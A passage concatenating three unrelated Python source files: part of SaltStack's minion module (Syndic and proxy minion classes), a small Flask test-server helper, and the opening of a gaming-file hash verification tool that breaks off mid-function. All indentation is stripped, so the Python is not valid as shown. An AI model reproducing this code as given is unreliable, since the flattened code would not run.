# Probably no init system (running in docker?)
log.warning(
'ping_interval reached without response '
'from the master, but service.restart '
'could not be run to restart the minion '
'daemon. ping_interval requires that the '
'minion is running under an init system.'
)
self._fire_master('ping', 'minion_ping', sync=False, timeout_handler=ping_timeout_handler)
except Exception:
log.warning('Attempt to ping master failed.', exc_on_loglevel=logging.DEBUG)
self.periodic_callbacks['ping'] = tornado.ioloop.PeriodicCallback(ping_master, ping_interval * 1000)
self.periodic_callbacks['ping'].start()
# add handler to subscriber
if hasattr(self, 'pub_channel') and self.pub_channel is not None:
self.pub_channel.on_recv(self._handle_payload)
elif self.opts.get('master_type') != 'disable':
log.error('No connection to master found. Scheduled jobs will not run.')
if start:
try:
self.io_loop.start()
if self.restart:
self.destroy()
except (KeyboardInterrupt, RuntimeError): # A RuntimeError can be re-raised by Tornado on shutdown
self.destroy()
def _handle_payload(self, payload):
if payload is not None and payload['enc'] == 'aes':
if self._target_load(payload['load']):
self._handle_decoded_payload(payload['load'])
elif self.opts['zmq_filtering']:
# In the filtering enabled case, we'd like to know when minion sees something it shouldnt
log.trace(
'Broadcast message received not for this minion, Load: %s',
payload['load']
)
# If it's not AES, and thus has not been verified, we do nothing.
# In the future, we could add support for some clearfuncs, but
# the minion currently has no need.
def _target_load(self, load):
# Verify that the publication is valid
if 'tgt' not in load or 'jid' not in load or 'fun' not in load \
or 'arg' not in load:
return False
# Verify that the publication applies to this minion
# It's important to note that the master does some pre-processing
# to determine which minions to send a request to. So for example,
# a "salt -G 'grain_key:grain_val' test.ping" will invoke some
# pre-processing on the master and this minion should not see the
# publication if the master does not determine that it should.
if 'tgt_type' in load:
match_func = self.matchers.get('{0}_match.match'.format(load['tgt_type']), None)
if match_func is None:
return False
if load['tgt_type'] in ('grain', 'grain_pcre', 'pillar'):
delimiter = load.get('delimiter', DEFAULT_TARGET_DELIM)
if not match_func(load['tgt'], delimiter=delimiter):
return False
elif not match_func(load['tgt']):
return False
else:
if not self.matchers['glob_match.match'](load['tgt']):
return False
return True
def destroy(self):
'''
Tear down the minion
'''
self._running = False
if hasattr(self, 'schedule'):
del self.schedule
if hasattr(self, 'pub_channel') and self.pub_channel is not None:
self.pub_channel.on_recv(None)
if hasattr(self.pub_channel, 'close'):
self.pub_channel.close()
del self.pub_channel
if hasattr(self, 'periodic_callbacks'):
for cb in six.itervalues(self.periodic_callbacks):
cb.stop()
def __del__(self):
self.destroy()
class Syndic(Minion):
'''
Make a Syndic minion, this minion will use the minion keys on the
master to authenticate with a higher level master.
'''
def __init__(self, opts, **kwargs):
self._syndic_interface = opts.get('interface')
self._syndic = True
# force auth_safemode True because Syndic don't support autorestart
opts['auth_safemode'] = True
opts['loop_interval'] = 1
super(Syndic, self).__init__(opts, **kwargs)
self.mminion = salt.minion.MasterMinion(opts)
self.jid_forward_cache = set()
self.jids = {}
self.raw_events = []
self.pub_future = None
def _handle_decoded_payload(self, data):
'''
Override this method if you wish to handle the decoded data
differently.
'''
# TODO: even do this??
data['to'] = int(data.get('to', self.opts['timeout'])) - 1
# Only forward the command if it didn't originate from ourselves
if data.get('master_id', 0) != self.opts.get('master_id', 1):
self.syndic_cmd(data)
def syndic_cmd(self, data):
'''
Take the now clear load and forward it on to the client cmd
'''
# Set up default tgt_type
if 'tgt_type' not in data:
data['tgt_type'] = 'glob'
kwargs = {}
# optionally add a few fields to the publish data
for field in ('master_id', # which master the job came from
'user', # which user ran the job
):
if field in data:
kwargs[field] = data[field]
def timeout_handler(*args):
log.warning('Unable to forward pub data: %s', args[1])
return True
with tornado.stack_context.ExceptionStackContext(timeout_handler):
self.local.pub_async(data['tgt'],
data['fun'],
data['arg'],
data['tgt_type'],
data['ret'],
data['jid'],
data['to'],
io_loop=self.io_loop,
callback=lambda _: None,
**kwargs)
def fire_master_syndic_start(self):
# Send an event to the master that the minion is live
if self.opts['enable_legacy_startup_events']:
# Old style event. Defaults to false in Sodium release.
self._fire_master(
'Syndic {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
'syndic_start',
sync=False,
)
self._fire_master(
'Syndic {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
tagify([self.opts['id'], 'start'], 'syndic'),
sync=False,
)
# TODO: clean up docs
def tune_in_no_block(self):
'''
Executes the tune_in sequence but omits extra logging and the
management of the event bus assuming that these are handled outside
the tune_in sequence
'''
# Instantiate the local client
self.local = salt.client.get_local_client(
self.opts['_minion_conf_file'], io_loop=self.io_loop)
# add handler to subscriber
self.pub_channel.on_recv(self._process_cmd_socket)
def _process_cmd_socket(self, payload):
if payload is not None and payload['enc'] == 'aes':
log.trace('Handling payload')
self._handle_decoded_payload(payload['load'])
# If it's not AES, and thus has not been verified, we do nothing.
# In the future, we could add support for some clearfuncs, but
# the syndic currently has no need.
@tornado.gen.coroutine
def reconnect(self):
if hasattr(self, 'pub_channel'):
self.pub_channel.on_recv(None)
if hasattr(self.pub_channel, 'close'):
self.pub_channel.close()
del self.pub_channel
# if eval_master finds a new master for us, self.connected
# will be True again on successful master authentication
master, self.pub_channel = yield self.eval_master(opts=self.opts)
if self.connected:
self.opts['master'] = master
self.pub_channel.on_recv(self._process_cmd_socket)
log.info('Minion is ready to receive requests!')
raise tornado.gen.Return(self)
def destroy(self):
'''
Tear down the syndic minion
'''
# We borrowed the local clients poller so give it back before
# it's destroyed. Reset the local poller reference.
super(Syndic, self).destroy()
if hasattr(self, 'local'):
del self.local
if hasattr(self, 'forward_events'):
self.forward_events.stop()
# TODO: need a way of knowing if the syndic connection is busted
class SyndicManager(MinionBase):
'''
Make a MultiMaster syndic minion, this minion will handle relaying jobs and returns from
all minions connected to it to the list of masters it is connected to.
Modes (controlled by `syndic_mode`:
sync: This mode will synchronize all events and publishes from higher level masters
cluster: This mode will only sync job publishes and returns
Note: jobs will be returned best-effort to the requesting master. This also means
(since we are using zmq) that if a job was fired and the master disconnects
between the publish and return, that the return will end up in a zmq buffer
in this Syndic headed to that original master.
In addition, since these classes all seem to use a mix of blocking and non-blocking
calls (with varying timeouts along the way) this daemon does not handle failure well,
it will (under most circumstances) stall the daemon for ~15s trying to forward events
to the down master
'''
# time to connect to upstream master
SYNDIC_CONNECT_TIMEOUT = 5
SYNDIC_EVENT_TIMEOUT = 5
def __init__(self, opts, io_loop=None):
opts['loop_interval'] = 1
super(SyndicManager, self).__init__(opts)
self.mminion = salt.minion.MasterMinion(opts)
# sync (old behavior), cluster (only returns and publishes)
self.syndic_mode = self.opts.get('syndic_mode', 'sync')
self.syndic_failover = self.opts.get('syndic_failover', 'random')
self.auth_wait = self.opts['acceptance_wait_time']
self.max_auth_wait = self.opts['acceptance_wait_time_max']
self._has_master = threading.Event()
self.jid_forward_cache = set()
if io_loop is None:
install_zmq()
self.io_loop = ZMQDefaultLoop.current()
else:
self.io_loop = io_loop
# List of events
self.raw_events = []
# Dict of rets: {master_id: {event_tag: job_ret, ...}, ...}
self.job_rets = {}
# List of delayed job_rets which was unable to send for some reason and will be resend to
# any available master
self.delayed = []
# Active pub futures: {master_id: (future, [job_ret, ...]), ...}
self.pub_futures = {}
def _spawn_syndics(self):
'''
Spawn all the coroutines which will sign in the syndics
'''
self._syndics = OrderedDict() # mapping of opts['master'] -> syndic
masters = self.opts['master']
if not isinstance(masters, list):
masters = [masters]
for master in masters:
s_opts = copy.copy(self.opts)
s_opts['master'] = master
self._syndics[master] = self._connect_syndic(s_opts)
@tornado.gen.coroutine
def _connect_syndic(self, opts):
'''
Create a syndic, and asynchronously connect it to a master
'''
auth_wait = opts['acceptance_wait_time']
failed = False
while True:
if failed:
if auth_wait < self.max_auth_wait:
auth_wait += self.auth_wait
log.debug(
"sleeping before reconnect attempt to %s [%d/%d]",
opts['master'],
auth_wait,
self.max_auth_wait,
)
yield tornado.gen.sleep(auth_wait) # TODO: log?
log.debug(
'Syndic attempting to connect to %s',
opts['master']
)
try:
syndic = Syndic(opts,
timeout=self.SYNDIC_CONNECT_TIMEOUT,
safe=False,
io_loop=self.io_loop,
)
yield syndic.connect_master(failed=failed)
# set up the syndic to handle publishes (specifically not event forwarding)
syndic.tune_in_no_block()
# Send an event to the master that the minion is live
syndic.fire_master_syndic_start()
log.info(
'Syndic successfully connected to %s',
opts['master']
)
break
except SaltClientError as exc:
failed = True
log.error(
'Error while bringing up syndic for multi-syndic. Is the '
'master at %s responding?', opts['master']
)
except (KeyboardInterrupt, SystemExit):
raise
except Exception:
failed = True
log.critical(
'Unexpected error while connecting to %s',
opts['master'], exc_info=True
)
raise tornado.gen.Return(syndic)
def _mark_master_dead(self, master):
'''
Mark a master as dead. This will start the sign-in routine
'''
# if its connected, mark it dead
if self._syndics[master].done():
syndic = self._syndics[master].result() # pylint: disable=no-member
self._syndics[master] = syndic.reconnect()
else:
# TODO: debug?
log.info(
'Attempting to mark %s as dead, although it is already '
'marked dead', master
)
def _call_syndic(self, func, args=(), kwargs=None, master_id=None):
'''
Wrapper to call a given func on a syndic, best effort to get the one you asked for
'''
if kwargs is None:
kwargs = {}
successful = False
# Call for each master
for master, syndic_future in self.iter_master_options(master_id):
if not syndic_future.done() or syndic_future.exception():
log.error(
'Unable to call %s on %s, that syndic is not connected',
func, master
)
continue
try:
getattr(syndic_future.result(), func)(*args, **kwargs)
successful = True
except SaltClientError:
log.error(
'Unable to call %s on %s, trying another...',
func, master
)
self._mark_master_dead(master)
if not successful:
log.critical('Unable to call %s on any masters!', func)
def _return_pub_syndic(self, values, master_id=None):
'''
Wrapper to call the '_return_pub_multi' a syndic, best effort to get the one you asked for
'''
func = '_return_pub_multi'
for master, syndic_future in self.iter_master_options(master_id):
if not syndic_future.done() or syndic_future.exception():
log.error(
'Unable to call %s on %s, that syndic is not connected',
func, master
)
continue
future, data = self.pub_futures.get(master, (None, None))
if future is not None:
if not future.done():
if master == master_id:
# Targeted master previous send not done yet, call again later
return False
else:
# Fallback master is busy, try the next one
continue
elif future.exception():
# Previous execution on this master returned an error
log.error(
'Unable to call %s on %s, trying another...',
func, master
)
self._mark_master_dead(master)
del self.pub_futures[master]
# Add not sent data to the delayed list and try the next master
self.delayed.extend(data)
continue
future = getattr(syndic_future.result(), func)(values,
'_syndic_return',
timeout=self._return_retry_timer(),
sync=False)
self.pub_futures[master] = (future, values)
return True
# Loop done and didn't exit: wasn't sent, try again later
return False
def iter_master_options(self, master_id=None):
'''
Iterate (in order) over your options for master
'''
masters = list(self._syndics.keys())
if self.opts['syndic_failover'] == 'random':
shuffle(masters)
if master_id not in self._syndics:
master_id = masters.pop(0)
else:
masters.remove(master_id)
while True:
yield master_id, self._syndics[master_id]
if len(masters) == 0:
break
master_id = masters.pop(0)
def _reset_event_aggregation(self):
self.job_rets = {}
self.raw_events = []
def reconnect_event_bus(self, something):
future = self.local.event.set_event_handler(self._process_event)
self.io_loop.add_future(future, self.reconnect_event_bus)
# Syndic Tune In
def tune_in(self):
'''
Lock onto the publisher. This is the main event loop for the syndic
'''
self._spawn_syndics()
# Instantiate the local client
self.local = salt.client.get_local_client(
self.opts['_minion_conf_file'], io_loop=self.io_loop)
self.local.event.subscribe('')
log.debug('SyndicManager \'%s\' trying to tune in', self.opts['id'])
# register the event sub to the poller
self.job_rets = {}
self.raw_events = []
self._reset_event_aggregation()
future = self.local.event.set_event_handler(self._process_event)
self.io_loop.add_future(future, self.reconnect_event_bus)
# forward events every syndic_event_forward_timeout
self.forward_events = tornado.ioloop.PeriodicCallback(self._forward_events,
self.opts['syndic_event_forward_timeout'] * 1000,
)
self.forward_events.start()
# Make sure to gracefully handle SIGUSR1
enable_sigusr1_handler()
self.io_loop.start()
def _process_event(self, raw):
# TODO: cleanup: Move down into event class
mtag, data = self.local.event.unpack(raw, self.local.event.serial)
log.trace('Got event %s', mtag) # pylint: disable=no-member
tag_parts = mtag.split('/')
if len(tag_parts) >= 4 and tag_parts[1] == 'job' and \
salt.utils.jid.is_jid(tag_parts[2]) and tag_parts[3] == 'ret' and \
'return' in data:
if 'jid' not in data:
# Not a job return
return
if self.syndic_mode == 'cluster' and data.get('master_id', 0) == self.opts.get('master_id', 1):
log.debug('Return received with matching master_id, not forwarding')
return
master = data.get('master_id')
jdict = self.job_rets.setdefault(master, {}).setdefault(mtag, {})
if not jdict:
jdict['__fun__'] = data.get('fun')
jdict['__jid__'] = data['jid']
jdict['__load__'] = {}
fstr = '{0}.get_load'.format(self.opts['master_job_cache'])
# Only need to forward each load once. Don't hit the disk
# for every minion return!
if data['jid'] not in self.jid_forward_cache:
jdict['__load__'].update(
self.mminion.returners[fstr](data['jid'])
)
self.jid_forward_cache.add(data['jid'])
if len(self.jid_forward_cache) > self.opts['syndic_jid_forward_cache_hwm']:
# Pop the oldest jid from the cache
tmp = sorted(list(self.jid_forward_cache))
tmp.pop(0)
self.jid_forward_cache = set(tmp)
if master is not None:
# __'s to make sure it doesn't print out on the master cli
jdict['__master_id__'] = master
ret = {}
for key in 'return', 'retcode', 'success':
if key in data:
ret[key] = data[key]
jdict[data['id']] = ret
else:
# TODO: config to forward these? If so we'll have to keep track of who
# has seen them
# if we are the top level masters-- don't forward all the minion events
if self.syndic_mode == 'sync':
# Add generic event aggregation here
if 'retcode' not in data:
self.raw_events.append({'data': data, 'tag': mtag})
def _forward_events(self):
log.trace('Forwarding events') # pylint: disable=no-member
if self.raw_events:
events = self.raw_events
self.raw_events = []
self._call_syndic('_fire_master',
kwargs={'events': events,
'pretag': tagify(self.opts['id'], base='syndic'),
'timeout': self._return_retry_timer(),
'sync': False,
},
)
if self.delayed:
res = self._return_pub_syndic(self.delayed)
if res:
self.delayed = []
for master in list(six.iterkeys(self.job_rets)):
values = list(six.itervalues(self.job_rets[master]))
res = self._return_pub_syndic(values, master_id=master)
if res:
del self.job_rets[master]
class ProxyMinionManager(MinionManager):
'''
Create the multi-minion interface but for proxy minions
'''
def _create_minion_object(self, opts, timeout, safe,
io_loop=None, loaded_base_name=None,
jid_queue=None):
'''
Helper function to return the correct type of object
'''
return ProxyMinion(opts,
timeout,
safe,
io_loop=io_loop,
loaded_base_name=loaded_base_name,
jid_queue=jid_queue)
def _metaproxy_call(opts, fn_name):
metaproxy = salt.loader.metaproxy(opts)
try:
metaproxy_name = opts['metaproxy']
except KeyError:
metaproxy_name = 'proxy'
errmsg = 'No metaproxy key found in opts for id ' + opts['id'] + '. ' + \
'Defaulting to standard proxy minion'
log.trace(errmsg)
metaproxy_fn = metaproxy_name + '.' + fn_name
return metaproxy[metaproxy_fn]
class ProxyMinion(Minion):
'''
This class instantiates a 'proxy' minion--a minion that does not manipulate
the host it runs on, but instead manipulates a device that cannot run a minion.
'''
# TODO: better name...
@tornado.gen.coroutine
def _post_master_init(self, master):
'''
Function to finish init after connecting to a master
This is primarily loading modules, pillars, etc. (since they need
to know which master they connected to)
If this function is changed, please check Minion._post_master_init
to see if those changes need to be propagated.
ProxyMinions need a significantly different post master setup,
which is why the differences are not factored out into separate helper
functions.
'''
mp_call = _metaproxy_call(self.opts, 'post_master_init')
return mp_call(self, master)
def _target_load(self, load):
'''
Verify that the publication is valid and applies to this minion
'''
mp_call = _metaproxy_call(self.opts, 'target_load')
return mp_call(self, load)
def _handle_payload(self, payload):
mp_call = _metaproxy_call(self.opts, 'handle_payload')
return mp_call(self, payload)
@tornado.gen.coroutine
def _handle_decoded_payload(self, data):
mp_call = _metaproxy_call(self.opts, 'handle_decoded_payload')
return mp_call(self, data)
@classmethod
def _target(cls, minion_instance, opts, data, connected):
mp_call = _metaproxy_call(opts, 'target')
return mp_call(cls, minion_instance, opts, data, connected)
@classmethod
def _thread_return(cls, minion_instance, opts, data):
mp_call = _metaproxy_call(opts, 'thread_return')
return mp_call(cls, minion_instance, opts, data)
@classmethod
def _thread_multi_return(cls, minion_instance, opts, data):
mp_call = _metaproxy_call(opts, 'thread_multi_return')
return mp_call(cls, minion_instance, opts, data)
class SProxyMinion(SMinion):
'''
Create an object that has loaded all of the minion module functions,
grains, modules, returners etc. The SProxyMinion allows developers to
generate all of the salt minion functions and present them with these
functions for general use.
'''
def gen_modules(self, initial_load=False):
'''
Tell the minion to reload the execution modules
CLI Example:
.. code-block:: bash
salt '*' sys.reload_modules
'''
self.opts['grains'] = salt.loader.grains(self.opts)
self.opts['pillar'] = salt.pillar.get_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
saltenv=self.opts['saltenv'],
pillarenv=self.opts.get('pillarenv'),
).compile_pillar()
if 'proxy' not in self.opts['pillar'] and 'proxy' not in self.opts:
errmsg = (
'No "proxy" configuration key found in pillar or opts '
'dictionaries for id {id}. Check your pillar/options '
'configuration and contents. Salt-proxy aborted.'
).format(id=self.opts['id'])
log.error(errmsg)
self._running = False
raise SaltSystemExit(code=salt.defaults.exitcodes.EX_GENERIC, msg=errmsg)
if 'proxy' not in self.opts:
self.opts['proxy'] = self.opts['pillar']['proxy']
# Then load the proxy module
self.proxy = salt.loader.proxy(self.opts)
self.utils = salt.loader.utils(self.opts, proxy=self.proxy)
self.functions = salt.loader.minion_mods(self.opts, utils=self.utils, notify=False, proxy=self.proxy)
self.returners = salt.loader.returners(self.opts, self.functions, proxy=self.proxy)
self.matchers = salt.loader.matchers(self.opts)
self.functions['sys.reload_modules'] = self.gen_modules
self.executors = salt.loader.executors(self.opts, self.functions, proxy=self.proxy)
fq_proxyname = self.opts['proxy']['proxytype']
# we can then sync any proxymodules down from the master
# we do a sync_all here in case proxy code was installed by
# SPM or was manually placed in /srv/salt/_modules etc.
self.functions['saltutil.sync_all'](saltenv=self.opts['saltenv'])
self.functions.pack['__proxy__'] = self.proxy
self.proxy.pack['__salt__'] = self.functions
self.proxy.pack['__ret__'] = self.returners
self.proxy.pack['__pillar__'] = self.opts['pillar']
# Reload utils as well (chicken and egg, __utils__ needs __proxy__ and __proxy__ needs __utils__
self.utils = salt.loader.utils(self.opts, proxy=self.proxy)
self.proxy.pack['__utils__'] = self.utils
# Reload all modules so all dunder variables are injected
self.proxy.reload_modules()
if ('{0}.init'.format(fq_proxyname) not in self.proxy
or '{0}.shutdown'.format(fq_proxyname) not in self.proxy):
errmsg = 'Proxymodule {0} is missing an init() or a shutdown() or both. '.format(fq_proxyname) + \
'Check your proxymodule. Salt-proxy aborted.'
log.error(errmsg)
self._running = False
raise SaltSystemExit(code=salt.defaults.exitcodes.EX_GENERIC, msg=errmsg)
self.module_executors = self.proxy.get('{0}.module_executors'.format(fq_proxyname), lambda: [])()
proxy_init_fn = self.proxy[fq_proxyname + '.init']
proxy_init_fn(self.opts)
self.opts['grains'] = salt.loader.grains(self.opts, proxy=self.proxy)
# Sync the grains here so the proxy can communicate them to the master
self.functions['saltutil.sync_grains'](saltenv='base')
self.grains_cache = self.opts['grains']
self.ready = True
|
utils.py
|
import threading
import contextlib
from flask import request, url_for
import requests
@contextlib.contextmanager
def serve_app(app, port, https=False):
opts = {'ssl_context': 'adhoc'} if https else {}
app.config['PREFERRED_URL_SCHEME'] = 'https' if https else 'http'
app.config['SERVER_NAME'] = 'localhost:' + str(port)
@app.route('/ping')
def ping():
return 'pong'
@app.route('/kill', methods=['POST'])
def kill():
request.environ['werkzeug.server.shutdown']()
return 'bye'
t = threading.Thread(target=lambda: app.run(port=port, **opts))
t.start()
with app.app_context():
# block until the server is up
def retry():
try:
requests.get(url_for('ping'), verify=False)
except requests.ConnectionError:
retry()
retry()
# run the tests
yield
# tear down the server
requests.post(url_for('kill'), verify=False)
t.join()
|
epsig2_gui.py
|
# epsig2_gui.py
# Ported from R## L######'ss LUA script version to python.
#
## from R##'s original epsig2.lua
## Usage:
## lua epsig2.lua bnkfilename [seed [reverse] ]
##
## examples: lua epsig2.lua ARI\10163088_F23B_6040_1.bnk
## lua epsig2.lua ARI\10163088_F23B_6040_1.bnk 1234
## lua epsig2.lua ARI\10163088_F23B_6040_1.bnk 00 reverse
## If no seed supplied then a seed of 00 is used
##
## Note wrt a Casino "reverse"'d result, the result wrt Casino datafiles is the
## last 8 chars of the result displayed. E.g.
## Result: 3371cc5638d735cefde5fb8da904ac8d54c2050c the result is 54c2050c
# Version History
# v1.0 - Initial Release
# v1.1 - Add support to SL1 datafile seed files via combobox and file chooser widget,
# updated GUI
# v1.2 - Add support to use MSL (QCAS) files and automatically flip the SEED as
# expected for completing CHK01 (Yick's request)
# v1.3 - Add support for multiple selection of BNK files
# - introduces Caching of Hashes
# v1.3.1 - Fixes Cache to also uniquely identify Seed
# v1.4 - Adds Cache File support to DEFAULT_CACHE_FILE
# v1.4.1 - cache is now a dict of a dicts,
# i.e. { "fname":
# { "seed": "hash_result",
# "filename": "C:\blah\blah\cache.json"
# }
# } - for readability.
# - fixed cache file location to "\\\Justice.qld.gov.au\\Data
# \\OLGR-TECHSERV\\TSS Applications Source\\J#####\\epsig2_cachefile.json"
# - supports multiple seeds for each file
# - adds user specifiable Cache File (when you want to control your own cache)
# - adds automatic validation of Cache File, the file is signed and
# verified prior to loading automatically, via SHA1 hash and a .sigs file
# v1.4.2 - add option to write to formatted log file (request by Y### L##)
# - add option to display flipped bits for Seed in Console Log as an option.
# (request by D### N#####)
# - Update json signature file verifications to use SHA256
# v1.4.3 - Exits out when BNK file does not exist.
# v1.4.4 - was here somewhere
# v1.5 - separate epsig2 class (for use with: from epsig2_gui import epsig2)
# - separate Cache File as a separate class
# - By Default, a File Cache is now used as the OS can manage the resource being used
# - new Seed class, to add support to formatting and different behaviours when using different hash types
# - seed is automatically padded/truncated automatically based on Hash-Type selected
# - Add support to BIN hashing (SG Gaming's ArgOS)
# - Add support to paste a complete path in the BNK/BIN file text edit field (for Bang's processes)
# - Now includes unit tests, to excercise the functions being utilised
# - Output to Output Field, has been changed to the format: <SEED>/t<HASH>/t<FNAME> -
# - GUI has been standardised: button sizes, padding, relief, etc.
# v1.6 - utilise epsig.exe as a sanity check.
# - test for spaces in BNK file names
# - test for other incorrect BNK file formats
import os
import sys
import csv
import hashlib
import hmac
import binascii
import struct
import array
import datetime
import string
import tkinter
import json
import tkinter as tk
import getpass
import logging
import threading
import time
import concurrent.futures
import atexit
import re
import subprocess
from tkinter import *
from tkinter import messagebox
from tkinter import ttk
from tkinter import filedialog
from threading import Thread
from datetime import datetime
from concurrent.futures import ThreadPoolExecutor, wait, as_completed
VERSION = "1.6"
TEST=True
EPSIG_LOGFILE = "epsig2.log"
MAXIMUM_BLOCKSIZE_TO_READ = 65535
ACCEPTABLE_HASH_ALGORITHMS = ['CR16', 'CR32','PS32','PS16','OA4F','OA4R','SHA1']
if TEST:
DEFAULT_CACHE_FILE="epsig2_cachefile_v3.json"
else:
DEFAULT_CACHE_FILE = "\\\Justice.qld.gov.au\\Data\\OLGR-TECHSERV\\TSS Applications Source\\James\\epsig2_cachefile_v3.json"
DEFAULT_STR_LBL_SEED_FILE = "Details of Seed File: <No SL1/MSL Seed File Selected>"
p_reset = "\x08"*8
## BNKEntry class
class BNKEntry:
# helper class for sanitizing BNK file entries
def __init__(self, line):
self.fields = [i for i in line if i] # remove empty strings
fields = self.fields
assert(len(fields) == 3), fields
# filenameX The filename+ext of a binary image (max 250 chars and must not contain spaces)
assert(len(fields[0]) < 250)
assert(" " not in fields[0]), fields[0]
self.fname = fields[0]
#algX The hash algorithm designation type to be used for the image.
# Refer to previous list of supported algorithm types & designations.
# Cannot be “BLNK” (i.e. no recursion)
assert(fields[1] in ACCEPTABLE_HASH_ALGORITHMS), fields[1]
self.hash_type = fields[1]
assert(fields[2] == 'p')
self.hash_type = fields[1]
def toJSON(self):
return (json.dumps(self, default=lambda o: o.__dict__, sort_keys = True, indent=4))
## CacheFile class
class CacheFile():
def __init__(self, fname):
logging.basicConfig(level=logging.DEBUG, format=' %(asctime)s - %(levelname)s- %(message)s')
self.user_cache_file = fname
self.cache_dict = self.importCacheFile() # read file
def clearFile(self):
cache_data = dict() # empty
self.updateCacheFile(cache_data)
def importCacheFile(self):
cache_data = dict() # empty
if self.user_cache_file: # Handle User selectable Cache File
cache_location = self.user_cache_file
else:
cache_location = DEFAULT_CACHE_FILE
if os.path.isfile(cache_location):
# Verify Cache Integrity
if self.verifyCacheIntegrity(cache_location[:-4] + "sigs"):
with open(cache_location,'r') as json_cachefile:
cache_data = json.load(json_cachefile)
else:
logging.warning("**** WARNING **** File Cache integrity issue: " +
" Cannot Verify signature")
logging.info("Generating new File Cache file: " + cache_location)
cache_data = {} # return empty cache
else:
logging.info(cache_location +
" cannot be found. Generating default file...")
with open(cache_location, 'w') as json_cachefile:
# write empty json file
json.dump({},
json_cachefile,
sort_keys=True,
indent=4,
separators=(',', ': '))
return(cache_data)
def verifyCacheIntegrity(self, cache_location_sigs):
if os.path.isfile(cache_location_sigs): # Sigs file exist?
with open(cache_location_sigs, 'r') as sigs_file:
cache_sigs_data = json.load(sigs_file)
my_hash = cache_sigs_data['cachefile_hash']
fname = cache_sigs_data['filename']
generated_hash = epsig2.dohash_sha256(self, fname)
if my_hash == generated_hash:
return True
else:
return False
else:
# advise user
logging.warning("**** WARNING **** Generating new Cache Sigs file")
if self.user_cache_file: # Handle User selectable Cache File
cache_location = self.user_cache_file
else:
cache_location = DEFAULT_CACHE_FILE
self.signCacheFile(cache_location) # Generate Cache
def signCacheFile(self, cache_location):
sigsCacheFile = cache_location[:-4] + "sigs" # .json file renaming to .sigs file
with open(sigsCacheFile,'w') as sigs_file:
h = epsig2.dohash_sha256(self, cache_location) # requires file name as input
timestamp = datetime.now()
sigs_dict = { 'cachefile_hash' : h,
'filename': cache_location,
'last_generated_by_user' : getpass.getuser(),
'date': str(timestamp.strftime("%Y-%m-%d %H:%M"))
}
json.dump(sigs_dict,
sigs_file,
sort_keys=True,
indent=4,
separators=(',', ': '))
def updateCacheFile(self, cache_dict):
if self.user_cache_file:
cache_location = self.user_cache_file
else:
cache_location = DEFAULT_CACHE_FILE
if os.path.isfile(cache_location):
with open(cache_location, 'w') as json_cachefile:
json.dump(cache_dict,
json_cachefile,
sort_keys=True,
indent=4,
separators=(',', ': '))
self.signCacheFile(cache_location) # Sign Cache
## Main epsig2 class
class epsig2():
def __init__(self, seed, filepath, options_d, cache_dict, hash_type_str, epsigexe=True):
logging.basicConfig(level=logging.DEBUG, format=' %(asctime)s - %(levelname)s- %(message)s')
self.verify_with_epsigexe = epsigexe # default this will use epsig.exe to verify BNK files.
self.seed = seed
self.filepath = filepath
self.options_d = options_d
self.mandir = os.path.dirname(self.filepath)
self.cache_dict = dict()
self.xor_result = ''
self.LogOutput = list()
self.user_cache_file = options_d['usr_cache_file']
self.selectedHashtype = hash_type_str
# this will delay each file to be checked.
if filepath.upper().endswith('BNK') and self.verify_with_epsigexe:
# use Rob's epsig3_7.exe to verify BNK file format
epsigexe_output = epsig2.bnkfile_validate_epsigexe(self, filepath, self.seed) # will block
if epsigexe_output and epsigexe_output['returncode'] == True:
for result in epsigexe_output['results']: # log epsig3_7.exe output to log file
logging.info("epsig.exe: " + result)
logging.info("epsig.exe: " + filepath + " format is correct.")
else:
logging.error("epsig.exe: " + os.path.basename(filepath) + " format Error. The file is not formatted as expected. Check the file contents for errors")
# need to provide error dialogue here
self.filepath = None
else:
if not self.verifyFileExists(self.filepath):
msg = "**** ERROR: " + self.filepath + " had errors while reading file contents"
logging.error(msg)
# self.processfile(self.filepath, chunks=8192)
def bnkfile_validate_epsigexe(self, fname, seed):
epsig_path = 'G:/OLGR-TECHSERV/BINIMAGE/epsig3_7.exe'
if not os.path.isfile(epsig_path):
logging.error("epsig.exe cannot be found in: " + epsig_path)
return None
if ' ' in os.path.basename(fname):
logging.error("no spaces allowed in filename: " + os.path.basename(fname))
return None
# the following will block
proc = subprocess.run([epsig_path, fname, seed], capture_output=True) #stdout=subprocess.PIPE
err = proc.stderr.decode('utf-8')
stdout = proc.stdout.decode('utf-8').split("\r\n")
stdout = [i for i in stdout if i] # remove empty strings
result_l = list()
for row in stdout:
if row.startswith('Hash'):
result_l.append(row)
rv = dict()
rv['err'] = err
rv['stdout'] = stdout
rv['results'] = result_l
rv['returncode'] = proc.returncode == 0
return rv
def verifyFileExists(self, fname):
mandir = os.path.dirname(fname)
rv = False
if os.path.isfile(fname) and fname.endswith(".BNK"):
with open(fname, 'r', encoding='utf-8') as bnkfile:
f = csv.reader(bnkfile, delimiter=' ')
try:
for line in f:
BNKEntry(line) # parse for errors
rv = True
except csv.Error as e:
sys.exit('fname %s, line %d: %s' % (fname, f.line_num, e))
elif os.path.isfile(fname):
rv = True
else:
return False
return rv
# def verifyFileExists(self, fname):
# mandir = os.path.dirname(fname)
# rv = True
# with open(fname, 'r') as infile:
# fdname = ['fname', 'type', 'blah']
# reader = csv.DictReader(infile, delimiter=' ', fieldnames = fdname)
# for row in reader:
# fp = os.path.join(mandir, str(row['fname']))
# if str(row['type']).upper() == 'SHA1' or str(row['type']).upper() == 'SHA256':
# # check if the file exists
# if not (os.path.isfile(fp)):
# msg = "**** ERROR: " + fp + " cannot be read from disk"
# logging.error(msg)
# rv = False
# else:
# msg = fp + " is not an expected hash type"
# logging.error(msg)
# rv = False
# return rv
# def verifyFileExists(self, f):
# rv = True
# if f.endswith(".BNK"):
# with open(f, 'r') as infile:
# fdname = ['fname', 'type', 'blah']
# reader = csv.DictReader(infile, delimiter=' ', fieldnames = fdname)
# for row in reader:
# path = os.path.dirname(f)
# fp = os.path.join(path, str(row['fname'])) # can't use: os.path.join(self.mandir, str(row['fname'])), as the Cache expects "/"
# if not os.path.isfile(fp):
# msg = "**** ERROR: " + fp + " cannot be read from disk"
# logging.error(msg)
# rv = False
# else:
# if not os.path.isfile(f):
# rv= False
# return rv
# returns Hashstring or None (if faiiled)
def checkCacheFilename(self, filename, seed_input, alg_input): # alg_input
# For filename_seed, concatenate to form unique string.
if filename in self.cache_dict.keys(): # a hit?
data = self.cache_dict.get(filename) # now a list
for item in data:
